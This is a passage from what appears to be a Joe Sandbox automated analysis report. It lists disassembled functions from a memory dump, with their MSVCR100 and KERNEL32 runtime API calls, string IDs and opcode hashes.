                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E37
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno$_errno_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8648
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8650
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8670
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8678
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8683
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF86DA
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF86E5
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                          • _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A675: __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FD8A6B0
                                                                                                            • Part of subcall function 6FD8A675: _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB042A
                                                                                                            • Part of subcall function 6FD8A675: _invalid_parameter_noinfo.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0435
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _get_osfhandle.MSVCR100(00000002), ref: 6FD95AC2
                                                                                                          • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6FD95ACB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDAF4BA
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A96F
                                                                                                          • _lock.MSVCR100(0000000A,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A981
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8A998
                                                                                                          • _errno.MSVCR100(6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FDA74B9
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCFD0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCFDB
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCFEC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCFF7
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCF3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCF47
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCF58
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCF63
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 6d056a4e88e1fb9190caef913492ab2527ce1ef6280bceb4dc50830bf1ec0456
                                                                                                          • Instruction ID: 2a8d8308fe1af28d1caec68ff27e80f27ed4e270e4ca8b719c1a4d607679ceff
                                                                                                          • Opcode Fuzzy Hash: 6d056a4e88e1fb9190caef913492ab2527ce1ef6280bceb4dc50830bf1ec0456
                                                                                                          • Instruction Fuzzy Hash: 5F11E57650730ADFCF905FA4DC80C8AF775EF413B8B22022AE9555A150CB31F662D6B1
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FD8EB19
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB02EE
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB02F6
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB030C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB0317
                                                                                                          • _errno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB031E
                                                                                                          • __doserrno.MSVCR100(6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDB0329
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8EB64: _isatty.MSVCR100(?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FD8EBF3
                                                                                                            • Part of subcall function 6FD8EB64: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE), ref: 6FD8EC24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                                                                                          • String ID:
                                                                                                          • API String ID: 3635451409-0
                                                                                                          • Opcode ID: 4c9b3b51aa1e7b25cd66750136790fceaedfeed74a50b894177f478118d0c5bc
                                                                                                          • Instruction ID: 055c30969a1117aaf009f6b11809549fad3cc3b745f0ada48eef718ed3657128
                                                                                                          • Opcode Fuzzy Hash: 4c9b3b51aa1e7b25cd66750136790fceaedfeed74a50b894177f478118d0c5bc
                                                                                                          • Instruction Fuzzy Hash: 4811BF71841345DFD791AFA4CE8876C3760AF02369F055649D4329B1E1EBB8B9408FB1
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFA9DD
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFA9E5
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA04
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA0C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA17
                                                                                                          • _errno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA66
                                                                                                          • __doserrno.MSVCR100(6FDFAAA0,00000010), ref: 6FDFAA71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: da43709c7dda86c165317d755a56977d700603b54c91990c9fd4baa61ef567ca
                                                                                                          • Instruction ID: ea7e6c944bc3418ab3e72f4dbed5a795e81ffcacea51fc2b899f713952b20839
                                                                                                          • Opcode Fuzzy Hash: da43709c7dda86c165317d755a56977d700603b54c91990c9fd4baa61ef567ca
                                                                                                          • Instruction Fuzzy Hash: 8111BC71842349DFE791AFB8CA80B6D37A0AF02329F178251D4305F1D1DBB8BA468B71
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA244
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA24C
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA26B
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA273
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA27E
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA2C5
                                                                                                          • __doserrno.MSVCR100(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA2D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 8443d23d43efd5996ac8f716503869233d6e7bebd20e7b516d787bfd858f993b
                                                                                                          • Instruction ID: 59ceee9841b9c87075a2a1096bb3edb21b4c1c31317bf498cbe5e42b408665fb
                                                                                                          • Opcode Fuzzy Hash: 8443d23d43efd5996ac8f716503869233d6e7bebd20e7b516d787bfd858f993b
                                                                                                          • Instruction Fuzzy Hash: E2118831A42745CEE790AFA8C984B6C37A0AF02339F126245D0309B1D1DBB9B9429B71
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000D,6FDFBEB0,00000008), ref: 6FDFBE07
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 6FDFBE19
                                                                                                          • free.MSVCR100(?), ref: 6FDFBE2E
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • _lock.MSVCR100(0000000C,6FDFBEB0,00000008), ref: 6FDFBE47
                                                                                                          • free.MSVCR100(?,6FDFBEB0,00000008), ref: 6FDFBE8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lockfree$CriticalDecrementEnterFreeHeapInterlockedSection
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 3981277889-2441139153
                                                                                                          • Opcode ID: 4b60a1e3c567996fceec3e5fab2a65e68154be7fc0b7abfcf78dd11a9dcce70b
                                                                                                          • Instruction ID: 7b7fde785e9d147141a7ad4cab7fb35edbfd96ac78486f9cdb5655317ee5a593
                                                                                                          • Opcode Fuzzy Hash: 4b60a1e3c567996fceec3e5fab2a65e68154be7fc0b7abfcf78dd11a9dcce70b
                                                                                                          • Instruction Fuzzy Hash: F911A131503702EAEBA49F749804F4E77E4AF00768F21450AE1BADB0D0DB76F9818B20
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA993
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA99E
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _sopen_s.MSVCR100(00000000,00000000,00008002,00000040,00000000), ref: 6FDDA9B8
                                                                                                          • _futime64.MSVCR100(00000000,?), ref: 6FDDA9CC
                                                                                                          • _errno.MSVCR100 ref: 6FDDA9DA
                                                                                                          • _close.MSVCR100(00000000), ref: 6FDDA9E9
                                                                                                          • _errno.MSVCR100 ref: 6FDDA9F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_close_futime64_invalid_parameter_invalid_parameter_noinfo_sopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 4114205011-0
                                                                                                          • Opcode ID: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                          • Instruction ID: cf4a0395473dd4648837ee6ad3bebca5d288a293abe06718bf009da2eef5a287
                                                                                                          • Opcode Fuzzy Hash: 98dfde91b35ce29ae28cc6a0999241e032e96967552797d283f678174d732f76
                                                                                                          • Instruction Fuzzy Hash: 0B016232505308FADB402FA9DC05B893B659F81778F52C211FA289F1D1DB31BA8197A1
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD9EDE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD9EE9
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _sopen_s.MSVCR100(00000000,00000000,00008002,00000040,00000000), ref: 6FDD9F03
                                                                                                          • _futime32.MSVCR100(00000000,?), ref: 6FDD9F17
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F25
                                                                                                          • _close.MSVCR100(00000000), ref: 6FDD9F34
                                                                                                          • _errno.MSVCR100 ref: 6FDD9F3F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_close_futime32_invalid_parameter_invalid_parameter_noinfo_sopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 69840952-0
                                                                                                          • Opcode ID: ece3f39c6dd8f952d1eb5727fbec9b4eb7987178d3b1ac12a92b746cf500ff57
                                                                                                          • Instruction ID: 52a6b36f2b21169f5d237d4acae41c6cc341342f8f2e7ca56d0990d3af9241ef
                                                                                                          • Opcode Fuzzy Hash: ece3f39c6dd8f952d1eb5727fbec9b4eb7987178d3b1ac12a92b746cf500ff57
                                                                                                          • Instruction Fuzzy Hash: E1016232605308FADB801FB5DC45F893B659F817B8F119251FA285F1D0DB32F98197A1
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB79
                                                                                                          • _errno.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB84
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCEC00,00000018), ref: 6FDCEB8F
                                                                                                          • _lock.MSVCR100(00000007,6FDCEC00,00000018), ref: 6FDCEB9B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,6FDCEC00,00000018), ref: 6FDCEBBD
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCEBCD
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCEBD4
                                                                                                            • Part of subcall function 6FD8AABF: __doserrno.MSVCR100(?,?,6FDF8605,00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FD8AAC5
                                                                                                            • Part of subcall function 6FD8AABF: _errno.MSVCR100(?,?,6FDF8605,00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FD8AAD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$CurrentDirectoryErrorLast_dosmaperr_invalid_parameter_noinfo_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2898266085-0
                                                                                                          • Opcode ID: dbb328dad9653927e6af7aa94cbfde2031225571feed8e9748c0d4952c41a877
                                                                                                          • Instruction ID: 9d2a0b9e0cfcecaf519c934bcae4985750237e5efc81db4f7826dcce8b040f57
                                                                                                          • Opcode Fuzzy Hash: dbb328dad9653927e6af7aa94cbfde2031225571feed8e9748c0d4952c41a877
                                                                                                          • Instruction Fuzzy Hash: C101CCB280030896EB90ABB4C80A79D77B5BF05368F152246D025BB1D0DB78B9408B72
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FD81F38,00000008,6FDA75E9,00000000,00000000), ref: 6FD81EAC
                                                                                                          • _lock.MSVCR100(0000000D), ref: 6FD81EE0
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FD81EED
                                                                                                            • Part of subcall function 6FD81E4E: _unlock.MSVCR100(0000000D,6FD81EFF), ref: 6FD81E50
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FD81F01
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _lock$CriticalEnterHandleIncrementInterlockedModuleSection_unlock
                                                                                                          • String ID: KERNEL32.DLL$Jo
                                                                                                          • API String ID: 2973837600-3261423612
                                                                                                          • Opcode ID: bbdbbd578c5c81ff0209c2cad4e022d8885b901a569afdf4278a9c7ab883191e
                                                                                                          • Instruction ID: ff007786cd762797faf53120d67b261fcf1bc2fed48b3e906106ddb50ed4f1ff
                                                                                                          • Opcode Fuzzy Hash: bbdbbd578c5c81ff0209c2cad4e022d8885b901a569afdf4278a9c7ab883191e
                                                                                                          • Instruction Fuzzy Hash: 04018071505B40DBE7619F65C805749FBE0BF41324F208A4ED4B6972E0CBB4B648CF25
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6FE1FF1C,000000FF,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BF0
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDB8BF3
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BFA
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8BFD
                                                                                                          • GetLastError.KERNEL32(?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C07
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C1F
                                                                                                          • _CxxThrowException.MSVCR100(6FE20C48,6FE20C48,00000000,?,6FDC0AE8,?,?,?,00000000), ref: 6FDB8C2D
                                                                                                          Similarity
                                                                                                          • API ID: Current$Process$??0scheduler_resource_allocation_error@Concurrency@@DuplicateErrorExceptionHandleLastThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4210591502-0
                                                                                                          • Opcode ID: 8cdc957682d2d8d1ff4b4a31df0890cab974628f2b6590d2e8ba1cadae2fb2e2
                                                                                                          • Instruction ID: 369e7dafc0d3c5b5ccbc93e3b496b20b31ece939362107a29a3e6e812af8852e
                                                                                                          • Opcode Fuzzy Hash: 8cdc957682d2d8d1ff4b4a31df0890cab974628f2b6590d2e8ba1cadae2fb2e2
                                                                                                          • Instruction Fuzzy Hash: F8F090B2A0471666DB50ABB08C1DF9F3AACBF05750F444624B612DB0C0DB34F4118BA0
                                                                                                          APIs
                                                                                                          • _FindAndUnlinkFrame.MSVCR100(?,6FDF41BF,?), ref: 6FDF41DC
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983D7
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983EB
                                                                                                          • _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41E2
                                                                                                          • _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41F0
                                                                                                          • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FDF4233
                                                                                                          • __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6FDF4241
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 473968603-1018135373
                                                                                                          • Opcode ID: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                                                                                          • Instruction ID: bb1ad29caa8a1bc362d542bf8d4b6db622e9d8fa011eff979f33ebb4fe9c8585
                                                                                                          • Opcode Fuzzy Hash: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                                                                                          • Instruction Fuzzy Hash: A0014B39816705CADBA49F60D540E9DB3F5BF03211F96462ED451DB6A1CB32B682CB21
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCE951
                                                                                                          • _errno.MSVCR100 ref: 6FDCE959
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCE964
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 6FDCE971
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE97C
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCE983
                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6FDCE99D
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile$ErrorLast__doserrno_dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2713031092-0
                                                                                                          • Opcode ID: d9c0af64d36b00f37bded13161cb4443b9fb597f4f8d739d6f4601677c34e088
                                                                                                          • Instruction ID: 395c9f21d6d2f6a4f0673fdd28df7be0678d6baf72b15d60712375f3cb4f8c81
                                                                                                          • Opcode Fuzzy Hash: d9c0af64d36b00f37bded13161cb4443b9fb597f4f8d739d6f4601677c34e088
                                                                                                          • Instruction Fuzzy Hash: 67F030B1414708EADBC01BB4D9057693B9CAF02376F155315F4388A5E0DF74F4519662
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0312
                                                                                                          • _errno.MSVCR100 ref: 6FDD031A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0325
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 6FDD0332
                                                                                                          • GetLastError.KERNEL32 ref: 6FDD033D
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDD0344
                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 6FDD035E
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile$ErrorLast__doserrno_dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2713031092-0
                                                                                                          • Opcode ID: 4ef8b9ee704a7458509e7f09e881a49ca371c0b68843910309f19d02bb2e2d14
                                                                                                          • Instruction ID: 555d8128f94fb6c8376c15868d9561959ee7d5470ccd0b270bcc39eca36c08b9
